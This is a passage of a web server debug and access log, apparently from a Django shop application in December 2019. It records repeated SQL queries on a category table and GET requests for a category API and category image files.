"shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 05:59:05,255 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 05:59:05,259 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 05:59:05,262 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 05:59:05,264 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 05:59:05,267 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 05:59:05,269 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 05:59:05,273 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 05:59:05,276 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 05:59:05,278 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 05:59:05,280 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 05:59:05,283 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 05:59:05,285 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 05:59:05,289 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 05:59:05,291 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 05:59:05,293 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 05:59:05,296 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 05:59:05,299 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 05:59:05] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [20/Dec/2019 05:59:06] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 200 387799 [20/Dec/2019 05:59:06] "GET /media/categories/2019/12/13/collection6_4Q1Rpjs.png HTTP/1.0" 200 600645 [20/Dec/2019 05:59:06] "GET /media/categories/2019/12/13/collection6.png HTTP/1.0" 200 600645 [20/Dec/2019 05:59:06] "GET /media/categories/2019/12/13/collection3.png HTTP/1.0" 200 784410 [20/Dec/2019 05:59:06] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [20/Dec/2019 05:59:06] "GET /media/categories/2019/12/13/collection6_YoOFERO.png HTTP/1.0" 200 600645 [20/Dec/2019 05:59:08] "GET /media/categories/2019/12/13/collection3_3c60jfJ.png HTTP/1.0" 200 784410 [20/Dec/2019 05:59:09] "GET /media/categories/2019/12/13/popular3.png HTTP/1.0" 200 309908 [20/Dec/2019 05:59:09] "GET /media/categories/2019/12/13/collection4.png HTTP/1.0" 200 432480 [20/Dec/2019 05:59:09] "GET /media/categories/2019/12/13/collection3_blWHbYx.png HTTP/1.0" 200 784410 [20/Dec/2019 05:59:10] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [20/Dec/2019 05:59:11] "GET /media/categories/2019/12/13/collection3_lEyiVWB.png HTTP/1.0" 200 784410 [20/Dec/2019 05:59:11] "GET /media/categories/2019/12/13/collection3_pKohXg6.png HTTP/1.0" 200 784410 [20/Dec/2019 05:59:11] "GET /media/categories/2019/12/13/collection3_rYale9k.png HTTP/1.0" 200 784410 [20/Dec/2019 05:59:12] "GET /media/categories/2019/12/13/collection3_O3U2Kj1.png HTTP/1.0" 200 784410 [20/Dec/2019 05:59:12] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [20/Dec/2019 05:59:12] "GET /media/categories/2019/12/13/collection7_sU2pbFG.png HTTP/1.0" 200 379075 [20/Dec/2019 05:59:14] "GET /media/categories/2019/12/13/collection7_s1gVgUK.png HTTP/1.0" 200 379075 [20/Dec/2019 05:59:14] "GET /media/categories/2019/12/13/collection7_zgKzb94.png HTTP/1.0" 200 379075 [20/Dec/2019 05:59:14] "GET /media/categories/2019/12/13/collection7_ZCM4YHI.png HTTP/1.0" 200 379075 [20/Dec/2019 05:59:15] "GET /media/categories/2019/12/13/collection7.png HTTP/1.0" 200 379075 [20/Dec/2019 05:59:15] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [20/Dec/2019 05:59:15] "GET /media/categories/2019/12/13/collection4_45IbUzs.png HTTP/1.0" 200 432480 [20/Dec/2019 05:59:16] "GET /media/categories/2019/12/13/collection4_klUHkrJ.png HTTP/1.0" 200 432480 [20/Dec/2019 05:59:16] "GET /media/categories/2019/12/13/collection4_wmrC3xY.png HTTP/1.0" 200 432480 [20/Dec/2019 05:59:17] "GET /media/categories/2019/12/13/collection4_ykrPiOh.png HTTP/1.0" 200 432480 [20/Dec/2019 05:59:17] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [20/Dec/2019 05:59:18] "GET /media/categories/2019/12/13/collection8_qT6o4Ze.png HTTP/1.0" 200 376652 [20/Dec/2019 05:59:18] "GET /media/categories/2019/12/13/collection8_98NdtQd.png HTTP/1.0" 200 376652 [20/Dec/2019 05:59:18] "GET /media/categories/2019/12/13/collection8_MKX5n4Y.png HTTP/1.0" 200 376652 [20/Dec/2019 05:59:19] "GET /media/categories/2019/12/13/collection8.png HTTP/1.0" 200 376652 [20/Dec/2019 05:59:19] "GET /media/categories/2019/12/13/collection5_NjJaGxE.png HTTP/1.0" 200 454674 [20/Dec/2019 05:59:19] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [20/Dec/2019 05:59:20] "GET /media/categories/2019/12/13/collection5_DOY3fSw.png HTTP/1.0" 200 454674 [20/Dec/2019 05:59:20] "GET /media/categories/2019/12/13/collection5_J2Tl3z7.png HTTP/1.0" 200 454674 [20/Dec/2019 05:59:20] "GET /media/categories/2019/12/13/collection5_VsJvXmq.png HTTP/1.0" 200 454674 [20/Dec/2019 05:59:21] "GET /media/categories/2019/12/13/collection5.png HTTP/1.0" 200 454674 [20/Dec/2019 05:59:21] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 [20/Dec/2019 05:59:21] "GET /media/categories/2019/12/13/weapons2.png HTTP/1.0" 200 523712 [20/Dec/2019 05:59:22] "GET /media/categories/2019/12/13/weapons1.png HTTP/1.0" 200 700594 [20/Dec/2019 05:59:22] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 [20/Dec/2019 05:59:22] "GET /media/categories/2019/12/13/collection9.png HTTP/1.0" 200 284188 [20/Dec/2019 05:59:24] "GET /media/categories/2019/12/13/collection9_y5Aperx.png HTTP/1.0" 200 284188 [20/Dec/2019 06:00:02] "GET /whm-server-status HTTP/1.0" 301 0 [20/Dec/2019 06:05:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 06:05:55,586 utils 4252 140031492613888 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 06:05:55,595 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 06:05:55,602 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 06:05:55,606 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 06:05:55,610 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 06:05:55,612 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 06:05:55,615 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 06:05:55,617 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 06:05:55,620 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 06:05:55,625 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 06:05:55,627 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 06:05:55,630 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 06:05:55,632 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 06:05:55,635 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 06:05:55,638 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 06:05:55,640 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 06:05:55,643 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 06:05:55,645 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 06:05:55,647 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 06:05:55,651 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 06:05:55,653 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 06:05:55,656 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 06:05:55,659 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 06:05:55,661 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 06:05:55,663 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 06:05:55,667 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 06:05:55,670 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 06:05:55,673 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 06:05:55,676 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 06:05:55,680 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 06:05:55,686 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 06:05:55,689 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 06:05:55,693 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 06:05:55,696 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 06:05:55,698 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 06:05:55,702 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 06:05:55,705 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 06:05:55,707 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 06:05:55,709 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY 